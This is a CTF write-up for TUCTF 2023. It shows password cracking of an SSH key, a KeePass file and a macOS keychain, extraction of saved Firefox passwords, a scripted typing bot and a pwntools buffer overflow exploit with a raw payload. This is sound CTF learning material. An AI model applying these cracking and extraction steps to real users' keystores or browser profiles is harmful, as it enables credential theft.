TUCTF - 2023

This is a write-up for some of the challenges I was able to complete at TUCTF 2023.

A.R.K 1 - Misc

[Image: A.R.K 1 challenge description]

The challenge gave us a private SSH key and told us to use only words containing "sheep". I thought I had to connect somewhere with it at the beginning, then realised it was just a cracking challenge, like the rest of the A.R.K challenges.

-----BEGIN OPENSSH PRIVATE KEY-----
[key body omitted]
-----END OPENSSH PRIVATE KEY-----

Create a custom wordlist:

grep sheep /usr/share/wordlists/rockyou.txt > custom

Crack it with ssh2john and John the Ripper:

ssh2john sheep > hash
john hash -w:custom

sheep:baabaablacksheep

The flag was the password wrapped in TUCTF{}.

A.R.K 2 - MISC

Another cracking challenge; this time we were given a KDBX file:

[Image: A.R.K 2 challenge description]
❯ file woof
woof: Keepass password database 2.x KDBX

Create the custom wordlist containing the word "dog":

grep dog /usr/share/wordlists/rockyou.txt > custom

Crack it with keepass2john and John the Ripper:

keepass2john woof > hash
john hash -w:custom

woof:wholetthedogsout

Open it with KeePass.

The flag was in the Recycle Bin, but the entry had been changed.

We just had to restore the previous version from the entry's history.

[Image: history of the entry in the KDBX file]
[Image: the real flag]

A.R.K 3 - MISC

Another cracking challenge, this time a Mac OS X Keychain file:

[Image: A.R.K 3 challenge description]
❯ file meow
meow: Mac OS X Keychain File

Create a custom wordlist:

grep meow /usr/share/wordlists/rockyou.txt > custom

I used the Chainbreaker tool to dump the hash of the file: https://github.com/n0fate/chainbreaker

❯ chainbreaker -a meow
2023-12-03 14:06:35,125 - INFO - Version - 3.0.3
2023-12-03 14:06:35,125 - INFO - Chainbreaker : https://github.com/n0fate/chainbreaker
2023-12-03 14:06:35,126 - INFO - Version: 3.0.3
2023-12-03 14:06:35,126 - INFO - Runtime Command: /usr/local/bin/chainbreaker -a meow
2023-12-03 14:06:35,126 - INFO - Keychain: meow
2023-12-03 14:06:35,126 - INFO - Keychain MD5: c0bbdc431e82ceb82c6c62ae4571a52a
2023-12-03 14:06:35,126 - INFO - Keychain 256: 0653458b0fc08b21b1cbd91c8434320edc0063efbaea221d0723c1e75df927b3
2023-12-03 14:06:35,126 - INFO - Dump Start: 2023-12-03 14:06:35.125963
2023-12-03 14:06:35,128 - WARNING - [!] Certificate Table is not available
2023-12-03 14:06:35,128 - INFO - 1 Keychain Password Hash
2023-12-03 14:06:35,128 - INFO - 	$keychain$*b'9196324d59f13ef6b20331e2e6d81da8993a02db'*b'34d065407b48d418'*b'976cb9617ec4e656d7fdbb097c525c9fc7502908aab1dc9aefbf40b24368ee8e78af756e91cc960a65d90f9be62e4240'

Just had to remove the b'...' wrappers (the b prefix and the quotes Chainbreaker prints around each field) to leave the hash in the format hashcat expects for mode 23100:

hashcat -m 23100 hash custom

password: coolcatmeow
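The b'...' clean-up above is a one-off by hand, but before handing the line to hashcat it is also worth checking that the three fields have the lengths mode 23100 expects (20-byte salt, 8-byte IV, 48-byte encrypted blob), because a line with a wrong field length is rejected as malformed. The following Python is an added example, not part of this write-up or of Chainbreaker: it takes Chainbreaker's log line, strips the Python bytes reprs, validates each hex field and returns the hashcat-ready line. The sample input is the hash line from the run above; the script name in the usage comment is assumed.

```python
import re
import sys

# Hashcat mode 23100 (Apple Keychain) takes $keychain$*<salt>*<iv>*<blob>
# with hex field lengths 40 (20-byte salt), 16 (8-byte IV) and 96 (48-byte blob).
FIELD_NAMES = ("salt", "iv", "blob")
FIELD_HEX_LENGTHS = (40, 16, 96)
PREFIX = "$keychain$*"

# Constructed sample: the hash line as Chainbreaker 3.x logged it in the run
# above, with each field wrapped as a Python bytes repr (b'...').
SAMPLE_LINE = (
    "2023-12-03 14:06:35,128 - INFO - \t$keychain$*"
    "b'9196324d59f13ef6b20331e2e6d81da8993a02db'*b'34d065407b48d418'*"
    "b'976cb9617ec4e656d7fdbb097c525c9fc7502908aab1dc9aefbf40b24368ee8e"
    "78af756e91cc960a65d90f9be62e4240'"
)

_BYTES_REPR = re.compile(r"^b'([0-9A-Fa-f]*)'$")
_HEX = re.compile(r"^[0-9A-Fa-f]+$")


def normalize_keychain_hash(line: str) -> str:
    """Turn a Chainbreaker log line (or an already clean hash) into a
    hashcat -m 23100 line. Raises ValueError when the hash is malformed."""
    idx = line.find(PREFIX)
    if idx < 0:
        raise ValueError("no $keychain$ hash in line")
    raw_fields = line[idx + len(PREFIX):].strip().split("*")
    if len(raw_fields) != len(FIELD_NAMES):
        raise ValueError(f"expected {len(FIELD_NAMES)} fields, got {len(raw_fields)}")
    clean = []
    for name, want, raw in zip(FIELD_NAMES, FIELD_HEX_LENGTHS, raw_fields):
        # Strip the b'...' wrapper if present; leave a bare hex field alone.
        m = _BYTES_REPR.match(raw)
        hexval = m.group(1) if m else raw
        if not _HEX.match(hexval):
            raise ValueError(f"{name}: not hex: {raw!r}")
        if len(hexval) != want:
            raise ValueError(f"{name}: {len(hexval)} hex chars, expected {want}")
        clean.append(hexval.lower())
    return PREFIX + "*".join(clean)


def normalize_lines(lines):
    """Pick the $keychain$ lines out of a whole Chainbreaker log and clean them."""
    return [normalize_keychain_hash(line) for line in lines if PREFIX in line]


if __name__ == "__main__":
    # Usage (script name assumed): chainbreaker -a meow | python3 keychain2hashcat.py > hash
    # Falls back to the constructed sample when nothing is piped in.
    source = sys.stdin if not sys.stdin.isatty() else [SAMPLE_LINE]
    for h in normalize_lines(source):
        print(h)
```

Feeding the whole Chainbreaker log through the script rather than copying the line by hand also means the leading log timestamp and the tab are dropped consistently, and a truncated copy-paste shows up as a length error instead of a hashcat parse failure.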

And then just dump the contents with that password:

❯ chainbreaker --dump-generic-passwords meow --password coolcatmeow
2023-12-03 14:08:49,894 - INFO - Version - 3.0.3
2023-12-03 14:08:49,894 - INFO - Chainbreaker : https://github.com/n0fate/chainbreaker
2023-12-03 14:08:49,894 - INFO - Version: 3.0.3
2023-12-03 14:08:49,894 - INFO - Runtime Command: /usr/local/bin/chainbreaker --dump-generic-passwords meow --password coolcatmeow
2023-12-03 14:08:49,894 - INFO - Keychain: meow
2023-12-03 14:08:49,894 - INFO - Keychain MD5: c0bbdc431e82ceb82c6c62ae4571a52a
2023-12-03 14:08:49,894 - INFO - Keychain 256: 0653458b0fc08b21b1cbd91c8434320edc0063efbaea221d0723c1e75df927b3
2023-12-03 14:08:49,895 - INFO - Dump Start: 2023-12-03 14:08:49.894666
2023-12-03 14:08:49,898 - INFO - 1 Generic Passwords
2023-12-03 14:08:49,899 - INFO - 	[+] Generic Password Record
2023-12-03 14:08:49,899 - INFO - 	[-] Create DateTime: 2023-11-27 22:43:23
2023-12-03 14:08:49,899 - INFO - 	[-] Last Modified DateTime: 2023-11-27 22:43:23
2023-12-03 14:08:49,899 - INFO - 	[-] Description: 
2023-12-03 14:08:49,899 - INFO - 	[-] Creator: 
2023-12-03 14:08:49,899 - INFO - 	[-] Type: 
2023-12-03 14:08:49,899 - INFO - 	[-] Print Name: b'flag'
2023-12-03 14:08:49,899 - INFO - 	[-] Alias: 
2023-12-03 14:08:49,900 - INFO - 	[-] Account: b'flag'
2023-12-03 14:08:49,901 - INFO - 	[-] Service: b'flag'
2023-12-03 14:08:49,901 - INFO - 	[-] Password: TUCTF{k3YCh41ns_AR3_sUp3r_c00L}
2023-12-03 14:08:49,901 - INFO - 	
2023-12-03 14:08:49,901 - INFO - 
2023-12-03 14:08:49,901 - INFO - Chainbreaker : https://github.com/n0fate/chainbreaker
2023-12-03 14:08:49,901 - INFO - Version: 3.0.3
2023-12-03 14:08:49,901 - INFO - Runtime Command: /usr/local/bin/chainbreaker --dump-generic-passwords meow --password coolcatmeow
2023-12-03 14:08:49,901 - INFO - Keychain: meow
2023-12-03 14:08:49,901 - INFO - Keychain MD5: c0bbdc431e82ceb82c6c62ae4571a52a
2023-12-03 14:08:49,901 - INFO - Keychain 256: 0653458b0fc08b21b1cbd91c8434320edc0063efbaea221d0723c1e75df927b3
2023-12-03 14:08:49,901 - INFO - Dump Start: 2023-12-03 14:08:49.894666
2023-12-03 14:08:49,901 - INFO - 	1 Generic Passwords
2023-12-03 14:08:49,902 - INFO - Dump End: 2023-12-03 14:08:49.901448

A.R.K 4 - MISC

The last cracking challenge; this time we were given a zip file with some Mozilla Firefox profile files:

[Image: A.R.K 4 challenge description]
[Image: contents of the extracted fox archive]

Just by running the tool firepwd in that directory we got the flag: https://github.com/lclevy/firepwd

firepwd is a tool that combines key4.db (the encrypted key store) with logins.json (the encrypted credentials) and returns the browser's saved passwords.

❯ python3 ~/Tools/firepwd/firepwd.py
globalSalt: b'2fc652a7ce01e8e33e32305be27942bc9a4b5707'
 SEQUENCE {
   SEQUENCE {
     OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
     SEQUENCE {
       SEQUENCE {
         OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
         SEQUENCE {
           OCTETSTRING b'8801df68ef2dc63819abeccfa48f18087a1ec29dbe37b94338690eacdf1b08ec'
           INTEGER b'01'
           INTEGER b'20'
           SEQUENCE {
             OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
           }
         }
       }
       SEQUENCE {
         OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
         OCTETSTRING b'ee5b8b61626485e1c953dc612deb'
       }
     }
   }
   OCTETSTRING b'9c4ea18bdaa31238d08a5bbdc8a5b2e9'
 }
clearText b'70617373776f72642d636865636b0202'
password check? True
 SEQUENCE {
   SEQUENCE {
     OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
     SEQUENCE {
       SEQUENCE {
         OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
         SEQUENCE {
           OCTETSTRING b'b4f5dfad6b6f3a55681de13a603d6770877b976d22781aeab74223e0c3868f01'
           INTEGER b'01'
           INTEGER b'20'
           SEQUENCE {
             OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
           }
         }
       }
       SEQUENCE {
         OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
         OCTETSTRING b'54540da34420dbd2de53b1dac951'
       }
     }
   }
   OCTETSTRING b'4b7e09bce487b8b3f05dece6a269dc20a95248de9f1eb3c68a26de9bfeb2dd3a'
 }
clearText b'15a2911c5807e66419f40ddf517a576d6d407643e0f20ecb0808080808080808'
decrypting login/password pairs
https://www.example.com:b'fox',b'TUCTF{B3w4R3_7h3_f1r3_4nd_7h3_f0x}'

Hacker Typer - Scripting

In Hacker Typer you just had to type the word shown on screen fast enough, 150 times in a row.

[Image: Hacker Typer challenge page]

I just created a custom script to do a GET request with Python and then POST the word back to the web application until it reached a 150 streak.

import re
import sys

import requests
from pwn import *   # only used for the log.progress indicator

get_url = 'https://hacker-typer.tuctf.com/'
post_url = 'https://hacker-typer.tuctf.com/check_word'

# The word to type sits in <strong name="word-title">...</strong> on the page
word_re = re.compile(r'<strong name="word-title">([^<]*)<')

s = requests.Session()   # keep the session cookie so the streak persists
p1 = log.progress("Typing words: ")
while True:
    r = s.get(get_url)
    m = word_re.search(r.text)
    if m is None:
        p1.failure("word not found in page")
        sys.exit(1)
    word = m.group(1)
    # Submit the word immediately, well inside the time limit
    p = s.post(post_url, data={'word': word})
    p1.status(p.text)
    if 'TUCTF' in p.text:
        # The response contains "You're fast!" followed by the flag in quotes
        flag = p.text.split("You're fast!")[1].split('"')[0]
        print('FLAG FOUND = ' + flag)
        break
[Image: flag found]

Hidden Value - PWN

Hidden Value was a challenge in which we needed a buffer overflow to overwrite a variable that was compared with 0xdeadbeef in order to make the program spit out the flag.

[Image: Hidden Value challenge description]
[Image: Ghidra decompilation of the function to be overflowed]

Script with pwntools:

from pwn import *

# Start the program locally (swap in the remote line for the live instance)
io = process('./hidden-value')
#io = remote('chal.tuctf.com', 30011)

# Debug level shows every byte sent and received
context.log_level = 'debug'

# 44 bytes of padding fill the buffer up to the variable compared with 0xdeadbeef
buffer = 44

# After receiving the prompt (ending in ': '), send the padding followed by
# 0xdeadbeef packed little-endian. p64 emits 8 bytes, so the 4 bytes after the
# variable are overwritten with zeros too; the manual payload below sends only
# the 4 low bytes.
io.sendlineafter(b': ', b'A' * buffer + p64(0xdeadbeef))

# Read everything until the program exits; the flag is in this output
# (recvall reads to EOF, so there is nothing left for an interactive session)
print(io.recvall().decode())

## manually

#python2 -c 'print 44 * "A" + "\xef\xbe\xad\xde"' > payload
#nc chal.tuctf.com 30011 < payload
[Image: flag]
